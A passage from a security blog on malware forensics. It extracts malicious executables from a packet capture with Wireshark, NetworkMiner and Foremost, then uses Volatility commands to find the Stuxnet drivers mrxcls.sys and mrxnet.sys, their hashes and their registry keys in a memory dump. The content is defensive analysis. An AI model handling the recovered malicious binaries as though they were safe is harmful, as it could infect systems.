<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTrUcfvGCW1_7SJ9xwJWE5p5JAjbsde2ykRrZvmUrcOmGtCjS5P7htEugQJxDfJjUQLP0iKBPL1hgqUENxZXupeUjeRhARPD_-zayC4ogbkZwBL4gUpnMlIBb0ChmavAhy8MCs1Xqojw/s1600/Wireshark_extracting_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTrUcfvGCW1_7SJ9xwJWE5p5JAjbsde2ykRrZvmUrcOmGtCjS5P7htEugQJxDfJjUQLP0iKBPL1hgqUENxZXupeUjeRhARPD_-zayC4ogbkZwBL4gUpnMlIBb0ChmavAhy8MCs1Xqojw/s640/Wireshark_extracting_4.png" height="307" width="640" /></a></div>
<br />
In the picture below shows you the files which are been recovered.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFSfa90dYzx9NLNSfCX98a2T7ytARzCSmHdIbt2iJIeg6ztbCICuR_OEH67Qv1w_CfEM8F40u9r6fj7dRPKDtlo7Mi99D8OCTr6pfIj_4YhSiUIMPSRfy8xu8WdCye7G6gFnofLS0rQ44/s1600/Wireshark_extracting_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFSfa90dYzx9NLNSfCX98a2T7ytARzCSmHdIbt2iJIeg6ztbCICuR_OEH67Qv1w_CfEM8F40u9r6fj7dRPKDtlo7Mi99D8OCTr6pfIj_4YhSiUIMPSRfy8xu8WdCye7G6gFnofLS0rQ44/s640/Wireshark_extracting_5.png" height="86" width="640" /></a></div>
<br />
We use the command below to filter only the executables.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz_AGG4OaPncp_yZJn2vRCw-vV6HRtZv-ib8VFkZh4CeBNbTLRs-hX0Ujv7gPyKQ_gdCtyAVuNeLCEVSagpzMt8AMK2EEZ3GzfWuVhD3wRWq2sTUSsiljcip5xDcw2H8kLS0eq6S67boA/s1600/Wireshark_extracting_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz_AGG4OaPncp_yZJn2vRCw-vV6HRtZv-ib8VFkZh4CeBNbTLRs-hX0Ujv7gPyKQ_gdCtyAVuNeLCEVSagpzMt8AMK2EEZ3GzfWuVhD3wRWq2sTUSsiljcip5xDcw2H8kLS0eq6S67boA/s640/Wireshark_extracting_6.png" height="82" width="640" /></a></div>
<br />
<div style="text-align: justify;">
If we upload these files to Virustotal, we check that all of them have been categorized as malicious.</div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/d78fb2c23422471657a077ff68906d6f6b639d7b7b00ef269fa3a2ce1b38710a/analysis/" target="_blank">https://www.virustotal.com/en/<wbr></wbr>file/<wbr></wbr>d78fb2c23422471657a077ff68906d<wbr></wbr>6f6b639d7b7b00ef269fa3a2ce1b38<wbr></wbr>710a/analysis/</a><br />
<br />
<a href="https://www.virustotal.com/en/file/816b21df749b17029af83f94273fe0fe480d25ee2f84fb25bf97d06a8fadefe4/analysis/" target="_blank">https://www.virustotal.com/en/<wbr></wbr>file/<wbr></wbr>816b21df749b17029af83f94273fe0<wbr></wbr>fe480d25ee2f84fb25bf97d06a8fad<wbr></wbr>efe4/analysis/</a><br />
<br />
<a href="https://www.virustotal.com/en/file/3483a7264a3bef074d0c2715e90350ca1aa7387dee937679702d5ad79b0c84ca/analysis/" target="_blank">https://www.virustotal.com/en/<wbr></wbr>file/<wbr></wbr>3483a7264a3bef074d0c2715e90350<wbr></wbr>ca1aa7387dee937679702d5ad79b0c<wbr></wbr>84ca/analysis/</a><br />
<br />
<a href="https://www.virustotal.com/en/file/5d651f449d12e6bc75a0c875b4dae19d8b3ec8b3933b6c744942b5763d5df08d/analysis/" target="_blank">https://www.virustotal.com/en/<wbr></wbr>file/<wbr></wbr>5d651f449d12e6bc75a0c875b4dae1<wbr></wbr>9d8b3ec8b3933b6c744942b5763d5d<wbr></wbr>f08d/analysis/</a><br />
<br />
<a href="https://www.virustotal.com/en/file/bd56609c386a6b5bc18254c7327d221af182193eee5008f6e405ab5c1215b070/analysis/" target="_blank">https://www.virustotal.com/en/<wbr></wbr>file/<wbr></wbr>bd56609c386a6b5bc18254c7327d22<wbr></wbr>1af182193eee5008f6e405ab5c1215<wbr></wbr>b070/analysis/</a></div>
<h3>
NetworkMinner</h3>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
NetworkMiner is another Network Forensic Analysis Tool (NFAT) for Windows. Also, it can be installed on Linux using Mono. This tool is a great alternative to Wireshark if you just want to extract the files which were downloaded, look at the sessions, discover the DNS queries or get details about the mails detected from a pcap file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Just loaded the traffic capture file, Network Minner downloads all files from it. Because of that, if you are using an Antivirus, It is possible it warns you if some file is detected as malicious.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2O66HbvHX_gE9q3ti8C0Rdikf642Tsun6-gHhnLPbxKYc_NsdikOfUDELUkPG6jm-lmmomM-7jwh0jg2T1y-9cqJvGLgQKe6TvXGpHY15ATq-j3sv7s-enqHeMuHjurXp1uEKxlWomc0/s1600/NetworkMinner_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2O66HbvHX_gE9q3ti8C0Rdikf642Tsun6-gHhnLPbxKYc_NsdikOfUDELUkPG6jm-lmmomM-7jwh0jg2T1y-9cqJvGLgQKe6TvXGpHY15ATq-j3sv7s-enqHeMuHjurXp1uEKxlWomc0/s1600/NetworkMinner_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2O66HbvHX_gE9q3ti8C0Rdikf642Tsun6-gHhnLPbxKYc_NsdikOfUDELUkPG6jm-lmmomM-7jwh0jg2T1y-9cqJvGLgQKe6TvXGpHY15ATq-j3sv7s-enqHeMuHjurXp1uEKxlWomc0/s640/NetworkMinner_1.png" height="184" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
You can find the folder where files have been recovered by right-clicking on a file and selecting "Open Folder". In the Picture below you can see this folder.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFqV-8YsoTWPvpsqJPPLPf2QDfy3wRtb_XAVzu9xoGx6c90ms3_MgMTWsQqZz65ldcfArv0qk2Gwebv8xLHnHpo-Cjm5Q2V7vFTUHW6J5zWw-OXfaCcOCLZUJjTlCoGecIPLSVngqoayU/s1600/NetworkMinner_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFqV-8YsoTWPvpsqJPPLPf2QDfy3wRtb_XAVzu9xoGx6c90ms3_MgMTWsQqZz65ldcfArv0qk2Gwebv8xLHnHpo-Cjm5Q2V7vFTUHW6J5zWw-OXfaCcOCLZUJjTlCoGecIPLSVngqoayU/s640/NetworkMinner_2.png" height="116" width="640" /></a></div>
<br />
If we get the SHA256 checksum of the PE files, we can see that the results are exactly the same than using Wireshark. We have got the sames files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbbMcKUx1dz8EVSOQX57F67cMPYcbaJ4VPIhwdYoEbAm9iNeM7RmzgOKoP491F9hTePfdf_hRQAFQI1BQB3GY5vM3Wx30DfCI5U0h2KImSJcnDdDDu5EIrtkaPHU6tjsdcVzw0Fs1gvBA/s1600/NetworkMinner_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbbMcKUx1dz8EVSOQX57F67cMPYcbaJ4VPIhwdYoEbAm9iNeM7RmzgOKoP491F9hTePfdf_hRQAFQI1BQB3GY5vM3Wx30DfCI5U0h2KImSJcnDdDDu5EIrtkaPHU6tjsdcVzw0Fs1gvBA/s640/NetworkMinner_6.png" height="96" width="640" /></a></div>
<h3>
Foremost</h3>
<div style="text-align: justify;">
Foremost is a well known file carving tool. It was developed by the United States Air Force Office of Special Investigations and The Centre for Information Systems Security Studies and Research and now, it has been opened to the general public.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This tool has been designed to work on image files,
such as those generated by dd,
Safeback, Encase, etc, or directly on a drive...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Although I usually use Wireshark or NetworkMinner I have read some blogs where they describe how to use Foremost to extract files from a pcap file. For this, I have decided to use it in our example.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Just downloaded we extract all files from the pcap file, we execute the command in the picture below to extract all the files.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-vIQs4Lr3CdodUM2h5L2AsobOxLu8bhYKTHFPb8T47B6LAbhtJB2ea1TMJq3wE2QLoL0H0Mp9tOmiONpNTvBqFMG0giXkc8TqfX2CtNHIZZ4nYpfhRqdd2YwaKi9V5upcTXJFKhkfjes/s1600/Foremost_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-vIQs4Lr3CdodUM2h5L2AsobOxLu8bhYKTHFPb8T47B6LAbhtJB2ea1TMJq3wE2QLoL0H0Mp9tOmiONpNTvBqFMG0giXkc8TqfX2CtNHIZZ4nYpfhRqdd2YwaKi9V5upcTXJFKhkfjes/s640/Foremost_1.png" height="505" width="640" /></a></div>
<br />
<div style="text-align: justify;">
We can check that a "/output/exe" folder has been created containing six files. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRHlRBg4RSeDHSakEQBvktwhZIO-ZRNXH6eWUKMbpYd2P_fRoNcrvTwvgqEYVUaH9Ov9yzbjInLPLwS6InZ7bNGu0jo8Qa7Oa_s4fhrI4BWhLAjURcUCJjvAS9xwVZw6O2malLagcvoJQ/s1600/Foremost_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRHlRBg4RSeDHSakEQBvktwhZIO-ZRNXH6eWUKMbpYd2P_fRoNcrvTwvgqEYVUaH9Ov9yzbjInLPLwS6InZ7bNGu0jo8Qa7Oa_s4fhrI4BWhLAjURcUCJjvAS9xwVZw6O2malLagcvoJQ/s1600/Foremost_2.png" /></a></div>
<br />
<div style="text-align: justify;">
But the checksum is different than we got with Wireshark or NetworkMinner. It seems like Foremost hasn't work well with the pcap file... For this reason I don't usually use it with a pcap file... </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdJIkFNxLfz43o7-fCu0bk_6S4WOIhmqt0114LkQJuCfxTkR7hdxuQZZ3zoRlGkMVTvwbnWsn0iqI-ffeo4h1c7BKsGkaW8l-VeLFmQvGaEhZxjOHPgnJD2kRg22wO63LmpkfdrWG93sk/s1600/Foremost_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdJIkFNxLfz43o7-fCu0bk_6S4WOIhmqt0114LkQJuCfxTkR7hdxuQZZ3zoRlGkMVTvwbnWsn0iqI-ffeo4h1c7BKsGkaW8l-VeLFmQvGaEhZxjOHPgnJD2kRg22wO63LmpkfdrWG93sk/s640/Foremost_4.png" height="101" width="640" /></a></div>
<br />
<div style="text-align: justify;">
I've uploaded these files to my Cuckoo Sandbox and it seems to be corrupted because the files couldn't run properly...</div>
<br />
<div style="text-align: justify;">
The VirusTotal links below redirect you to the reports of the corrupted executables:</div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/2bcc5f03e1d63c5fab4aa362f6aecd43def44cc3c246effc13accb7b27b1bd45/analysis/" target="_blank">https://www.virustotal.com/en/file/2bcc5f03e1d63c5fab4aa362f6aecd43def44cc3c246effc13accb7b27b1bd45/analysis/</a></div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/647e4bbed78346eccc7c2d12826da5f17414110e52fb200ee55f2b8c5df533f1/analysis/" target="_blank">https://www.virustotal.com/en/file/647e4bbed78346eccc7c2d12826da5f17414110e52fb200ee55f2b8c5df533f1/analysis/</a></div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/38bc430e9d8656ee227e48236157e716b1d5038e83e53937cb534a5920d28c28/analysis/" target="_blank">https://www.virustotal.com/en/file/38bc430e9d8656ee227e48236157e716b1d5038e83e53937cb534a5920d28c28/analysis/</a></div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/15964d7dd9644c8ce29fbcc4585b85394af10545ac2a2ba2315befe8e93b2a4d/analysis/" target="_blank">https://www.virustotal.com/en/file/15964d7dd9644c8ce29fbcc4585b85394af10545ac2a2ba2315befe8e93b2a4d/analysis/</a></div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/32159b706d1addf63cdb1978291fc7222558d8fb7a3044775e242fba9661838d/analysis/" target="_blank">https://www.virustotal.com/en/file/32159b706d1addf63cdb1978291fc7222558d8fb7a3044775e242fba9661838d/analysis/ </a></div>
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com1tag:blogger.com,1999:blog-3160485247929481680.post-67245141228121382702014-01-12T02:22:00.000-08:002014-01-12T02:34:19.586-08:00Stuxnet Trojan - Memory Forensics with Volatility | Part IIYou can read the first part of this post here:<br />
<br />
<a href="http://www.behindthefirewalls.com/2013/12/stuxnet-trojan-memory-forensics-with_16.html">http://www.behindthefirewalls.com/2013/12/stuxnet-trojan-memory-forensics-with_16.html</a><br />
<h3>
DETECTING API CALLS</h3>
<div style="text-align: justify;">
If we use the command below, we can see the strings of these exported files in order to try to locate some interesting words...</div>
<pre class="brush: java">strings evidences/process.*</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJgeRMxaJXhvLk3W9BaWInT08lxyz2vwDlyqV3ROsFKKXjQa5KeIXXIsDrS05fFfcrDl7f4CMR1Rl0ltrGEWIGaa33x2-a1aGDGaEUinwBEdaiPtAZLdeVJpagkHh9Wt8CUa2iFiyvHGY/s1600/Stuxnet_II_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJgeRMxaJXhvLk3W9BaWInT08lxyz2vwDlyqV3ROsFKKXjQa5KeIXXIsDrS05fFfcrDl7f4CMR1Rl0ltrGEWIGaa33x2-a1aGDGaEUinwBEdaiPtAZLdeVJpagkHh9Wt8CUa2iFiyvHGY/s640/Stuxnet_II_1.png" height="310" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Thank to Volatility we can find the apihooks of this memory dump. In the picture below, you will see the apihooks related with the malicious process 1928.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem malfind apihooks –p 1928</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbB3uWFJehWYPspJapf1rNFnscp_W3BiNv0xSCtYJTADm2NjQPhuhNzrGcbkdHXhn8DqNyyklNN4JbvRouWttDRUQmD6_LGOb22tcTOZTSIYCtDbCYFX6FbfGV1_Wa72shfi0LHzb1aRk/s1600/Stuxnet_II_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbB3uWFJehWYPspJapf1rNFnscp_W3BiNv0xSCtYJTADm2NjQPhuhNzrGcbkdHXhn8DqNyyklNN4JbvRouWttDRUQmD6_LGOb22tcTOZTSIYCtDbCYFX6FbfGV1_Wa72shfi0LHzb1aRk/s640/Stuxnet_II_2.png" height="281" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRu7_-ouxWWZyT8HiD0I-Q715man1albdiQJXYhb8k7daeowRooUZub7pW-LB_-y8e_rsQpcJdbeHmbydVDcwu_W1ySSeoMItT3Oa9NOyQiBhNi_JxG0HNzGFpy0hD-NGJqhsnvIhXPNI/s1600/Stuxnet_II_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRu7_-ouxWWZyT8HiD0I-Q715man1albdiQJXYhb8k7daeowRooUZub7pW-LB_-y8e_rsQpcJdbeHmbydVDcwu_W1ySSeoMItT3Oa9NOyQiBhNi_JxG0HNzGFpy0hD-NGJqhsnvIhXPNI/s640/Stuxnet_II_3.png" height="144" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
These calls are directly linked to the Stuxnet worm. You can read the article below from Symantec. </div>
<br />
<a href="http://www.symantec.com/connect/blogs/w32stuxnet-installation-details" target="_blank">http://www.symantec.com/connect/blogs/w32stuxnet-installation-details</a><br />
<h3>
DETECTING MALICIOUS DRIVERS</h3>
<div style="text-align: justify;">
With modscan we can pick up
previously unloaded drivers and drivers that have been
hidden/unlinked by rootkits.
</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem modscan</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZcBEWEGm9QVTKrpGeQfQ8-3SqKb6y_2igLPn1xBptJugQ4Fkp4-OUmG_YcJ4kr57Gv-9ADLeBzIrgX2YD_7N4fLtviwFp9nnvH94QhEw9DWrr1B9ZmSeCKULM4XfdWjsPxRISeX2IX_M/s1600/Stuxnet_II_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZcBEWEGm9QVTKrpGeQfQ8-3SqKb6y_2igLPn1xBptJugQ4Fkp4-OUmG_YcJ4kr57Gv-9ADLeBzIrgX2YD_7N4fLtviwFp9nnvH94QhEw9DWrr1B9ZmSeCKULM4XfdWjsPxRISeX2IX_M/s640/Stuxnet_II_4.png" height="148" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
The first driver draws our attention… Please, take notes of the “Base” value (0xb21d08000) because we will export it with the command bellow.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem moddump --dump-dir evidences/ --base 0xb21d8000</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2z24CW2Y8cn0r-_in-tfk9Y3OswLR2l5XypLI5IOrXS_f6as1X6XvoTTopX9vb3MRPPwGTfDqxLgDIwA5PxfkT0TL5qr-BraK-L2_Hxf1TL13uqQ-dX3PJlbCYAqUT69f-zSFYSncLVQ/s1600/Stuxnet_II_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2z24CW2Y8cn0r-_in-tfk9Y3OswLR2l5XypLI5IOrXS_f6as1X6XvoTTopX9vb3MRPPwGTfDqxLgDIwA5PxfkT0TL5qr-BraK-L2_Hxf1TL13uqQ-dX3PJlbCYAqUT69f-zSFYSncLVQ/s640/Stuxnet_II_5.png" height="54" width="640" /></a></div>
<br />
We get the sha256 hash of this driver...<br />
<pre class="brush: java">sha256sum evidences/driver.b21d8000.sys</pre>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPkTMd3b3vmSAfEr5D7yHJNXupLr7Z5gIH4Qn8ZLuQ_L0K5AJSfoUseLUKfrUt5pNS3aSP_m7h7tHlONa5Kt_rCadHET8Q5cORigp2xSkGcD-ou3T-dvtTU_HQ00JfSiqpcxm_oZdWcMo/s1600/Stuxnet_II_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPkTMd3b3vmSAfEr5D7yHJNXupLr7Z5gIH4Qn8ZLuQ_L0K5AJSfoUseLUKfrUt5pNS3aSP_m7h7tHlONa5Kt_rCadHET8Q5cORigp2xSkGcD-ou3T-dvtTU_HQ00JfSiqpcxm_oZdWcMo/s640/Stuxnet_II_6.png" height="28" width="640" /></a><br />
<br />
...and we upload it to <a href="http://www.virustotal.com/" target="_blank">www.virustotal.com</a><br />
<br />
<div style="text-align: justify;">
Here you have the report where you will see that this drivers has been recognized as malicious.</div>
<br />
<a href="https://www.virustotal.com/en/file/6aa1f54fbd8c79a3109bfc3e7274f212e5bf9c92f740d5a194167ea940c3d06c/analysis/" target="_blank">https://www.virustotal.com/en/file/6aa1f54fbd8c79a3109bfc3e7274f212e5bf9c92f740d5a194167ea940c3d06c/analysis/</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg08XtXKpuf0nE8W_b8stM8uEebwfUmjbRlhIop_6O3ChUEwihISJvt9D57XnLslkvpVZf2PqKg8gc7jq3XjIZgqFCH7oUbIB_3NGjoywbLrahvt9KqkyQv7-bkB5t2TDw4azU_qeToZGM/s1600/Stuxnet_II_VI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg08XtXKpuf0nE8W_b8stM8uEebwfUmjbRlhIop_6O3ChUEwihISJvt9D57XnLslkvpVZf2PqKg8gc7jq3XjIZgqFCH7oUbIB_3NGjoywbLrahvt9KqkyQv7-bkB5t2TDw4azU_qeToZGM/s1600/Stuxnet_II_VI.png" /></a></div>
<br />
<div style="text-align: justify;">
We have just detected a malicious driver but I think that it’s necessary to look for more drivers with a similar name in order to try to find a new ones...</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem modscan | grep mrx</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI3K5mFhfmhEUV2sDKvSZukc7QVz-QJm4jdc8yt5u0qCzhaq_TUGPvYlkYkUbYAuYX0VfVn27z9mH6si9t2yVq3nrn5mH0zaxMaEzRQQfgmudYX4b4fk0-nlthewwchkDc2HgdwzxWI7g/s1600/Stuxnet_II_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI3K5mFhfmhEUV2sDKvSZukc7QVz-QJm4jdc8yt5u0qCzhaq_TUGPvYlkYkUbYAuYX0VfVn27z9mH6si9t2yVq3nrn5mH0zaxMaEzRQQfgmudYX4b4fk0-nlthewwchkDc2HgdwzxWI7g/s640/Stuxnet_II_7.png" height="83" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Ok. Let’s go to export the second suspicious driver. We will follow the same steps as described above.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem moddump --dump-dir evidences/ --base 0xf895a000</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwmFLHqqb9LJSB6wgRUSGa6XOSPQEQk7gQjoIHpJ7D2UCEGhTWluEVDuLRveGt9E2itB3vvDguSjb-tGweNWCuew_pPuGe9hjtJbIN4j78V-eXy0OkRWxh81RBYYxLgeGAICVUTXzDwMo/s1600/Stuxnet_II_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwmFLHqqb9LJSB6wgRUSGa6XOSPQEQk7gQjoIHpJ7D2UCEGhTWluEVDuLRveGt9E2itB3vvDguSjb-tGweNWCuew_pPuGe9hjtJbIN4j78V-eXy0OkRWxh81RBYYxLgeGAICVUTXzDwMo/s640/Stuxnet_II_10.png" height="52" width="640" /></a></div>
<br />
<a href="https://www.virustotal.com/en/file/6bc86d3bd3ec0333087141215559aec5b11b050cc49e42fc28c2ff6c9c119dbd/analysis/" target="_blank">https://www.virustotal.com/en/file/6bc86d3bd3ec0333087141215559aec5b11b050cc49e42fc28c2ff6c9c119dbd/analysis/</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR8WtoMSgl98kqrSR2gEcjJ_CNc2eLu8AWyzjo8sLN7iOgZPJyvcXSZTUnRODhroUnUFzrcGvT8hDLHIQZHWbP0t1M3KXi4qgQZJoclWvK6jCd4P1DwhmY99EqsTfLMEmB-jAGje0v3K0/s1600/Stuxnet_II_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR8WtoMSgl98kqrSR2gEcjJ_CNc2eLu8AWyzjo8sLN7iOgZPJyvcXSZTUnRODhroUnUFzrcGvT8hDLHIQZHWbP0t1M3KXi4qgQZJoclWvK6jCd4P1DwhmY99EqsTfLMEmB-jAGje0v3K0/s640/Stuxnet_II_11.png" height="204" width="640" /></a></div>
<br />
We have just found two malicious drivers: mrxcls.sys and mrxnet.sys. <br />
<br />
I checked with the same commands the other two drivers and they aren’t categorized as malicious files. This is the reason I haven't show you.<br />
<h3>
DETECTING REGISTER KEYS</h3>
<div style="text-align: justify;">
In this section, we will detect the register keys that have been added to the computer. With the command below, we will see a lot of them.</div>
<pre class="brush: java">strings stuxnet.vmem | grep –i mrx | grep -i Services</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAnrstYfUxlwb_CHuAlt59rOL9v936OleZz-yru2xg_MhGkoQ-9smPsdRJrZ5lQ9HQ1kM_KyZT5SOWwY5jt3rFNXX3xeFesrJI8IEWz7-vtXO2LUMfB9VKF3KNZqfXD4VehpZAo9lpmaQ/s1600/Stuxnet_II_12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAnrstYfUxlwb_CHuAlt59rOL9v936OleZz-yru2xg_MhGkoQ-9smPsdRJrZ5lQ9HQ1kM_KyZT5SOWwY5jt3rFNXX3xeFesrJI8IEWz7-vtXO2LUMfB9VKF3KNZqfXD4VehpZAo9lpmaQ/s640/Stuxnet_II_12.png" height="138" width="640" /></a></div>
<br />
<div style="text-align: justify;">
We can obtain valuable information about some of them with the next commands.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem printkey -K 'ControlSet001\Services\MrxNet'</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVHLObLKvdHDwbBxWnrIHajMr42Sh2wjBa3UcuvE_6R1d_0tgne01UkAc6ddMp-l0QMXvdQ1V_o3SmcKZqObflNhUWAXi2f4TRGLrHPxa9uvrFxyLiQ1lraWQX4e4_8eevUIqvr1JmZhg/s1600/Stuxnet_II_13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVHLObLKvdHDwbBxWnrIHajMr42Sh2wjBa3UcuvE_6R1d_0tgne01UkAc6ddMp-l0QMXvdQ1V_o3SmcKZqObflNhUWAXi2f4TRGLrHPxa9uvrFxyLiQ1lraWQX4e4_8eevUIqvr1JmZhg/s640/Stuxnet_II_13.png" height="210" width="640" /></a></div>
<br />
<pre class="brush: java">python2 vol.py stuxnet .vmem printkey -K 'ControlSet001\Services\MrxCls'</pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
